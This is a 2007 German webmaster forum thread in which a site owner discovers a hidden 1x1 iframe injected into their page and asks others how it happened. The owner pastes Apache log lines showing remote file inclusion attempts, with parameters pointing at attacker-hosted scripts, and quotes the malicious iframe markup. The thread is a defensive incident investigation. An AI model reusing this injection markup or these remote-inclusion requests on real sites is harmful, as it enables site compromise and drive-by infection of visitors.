Webstatt.org - Community seit 2006 - 2012 (2024?)

häh? wie kann das sein?

user-139
06.05.2007 12:56

hey leute wie kann das sein ?
und zwar hab ich eben auf quelltextansicht geklickt auf meiner site www.alekeijer-kerb.de
und dann fand ich das hier!
<iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'></iframe>


das komische ist ich bin mir 10000%ig sicher das ich das nicht eingefügt hab ,
meine andere seite www.partypix-kohlbachtal .de ist wahrscheinlich durch ne sicherheitslücke im gallerysys gehacked worden(wahrscheinlich sogar mit nem bot der auf diese lücke programmiert ist)
wie kann das sein ? hat da jemand zurgriff auf meine dateien?

PS: kann das etwas mit den CHMOD rechten zu tun haben ?

OS: Windows XP CPU: AMD Athlon XP 3200+ RAM: 512MB DDR PC3200 (Dual Channel) Mainboard: MSI K7n2 Delta-L HDD: 80GB WD Graka:Radeon 9600 Pro =>Alekeijer Straussbuwe
Avatar user-125
06.05.2007 13:14

Menschen machen immer Fehler. Es wird immer Schwachstellen in einem Script oder Programm geben. Diese werden halt von einigen bösen Menschen ausgenutzt. Deswegen ist es ja so wichtig, das man immer fein seine Updates einspielt.

Du kannst ja einfach mal in den Logdaten des Apaches schauen, ob du dort etwas ungewöhnliches findest.

Liebe user-125y aka user-125 aka dionysos
user-139
06.05.2007 13:24

ich weiss garnich nach was ich suchen soll, einmal hab ich ne acess log (zugriffe auf den webspace) und ne ftp log , ..

OS: Windows XP CPU: AMD Athlon XP 3200+ RAM: 512MB DDR PC3200 (Dual Channel) Mainboard: MSI K7n2 Delta-L HDD: 80GB WD Graka:Radeon 9600 Pro =>Alekeijer Straussbuwe
user-139
06.05.2007 13:27

hab was gefunden!

2007-05-02
70.87.89.10 - - [02/May/2007:15:58:13 +0200] "GET /admin.php?page=http://www.freewebtown.com/haxors/main.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
204.14.18.149 - - [02/May/2007:20:05:27 +0200] "GET //adminpanel/includes/add_forms/addbioform.php?root_path=http://connectaserver.de/ckb_backup_for_digest_inst/admin/mods/admin_userlist/processed/language/lang_english/freeman.txt? HTTP/1.1" 404 329 "-" "libwww-perl/5.64"
2007-05-04
71.6.232.252 - - [04/May/2007:04:10:16 +0200] "POST /\"http:/www.http:/www.nowgoto.ws/fls/\" HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10"

schaut euch das mal an ,. könnte damit was zu tun haben oder?

OS: Windows XP CPU: AMD Athlon XP 3200+ RAM: 512MB DDR PC3200 (Dual Channel) Mainboard: MSI K7n2 Delta-L HDD: 80GB WD Graka:Radeon 9600 Pro =>Alekeijer Straussbuwe
user-157
06.05.2007 13:31

Bei .de.vu Domains und so wird auch per Frame eingebunden. Vielleicht liegts dadran?

asdf!
user-139
06.05.2007 13:46

mhh ka hab auf jeden ne .de domain!
ich glaub eher da hat jemand versucht diese datei runzuwurschdeln ,.

hab jetzt mal meine index.php nur mit leserechten ausgestattet und siehe da, seitdem wurde nichts mehr drin verändert!
aber das kann es ja nicht sein , und durch welche sicherheitslücke konntebdas passieren?
ich hab dieses menü welches auf arrays beruht ich glaube das von jex-treme ,. so einfach kann man da doch nichts einschleusen oder?

OS: Windows XP CPU: AMD Athlon XP 3200+ RAM: 512MB DDR PC3200 (Dual Channel) Mainboard: MSI K7n2 Delta-L HDD: 80GB WD Graka:Radeon 9600 Pro =>Alekeijer Straussbuwe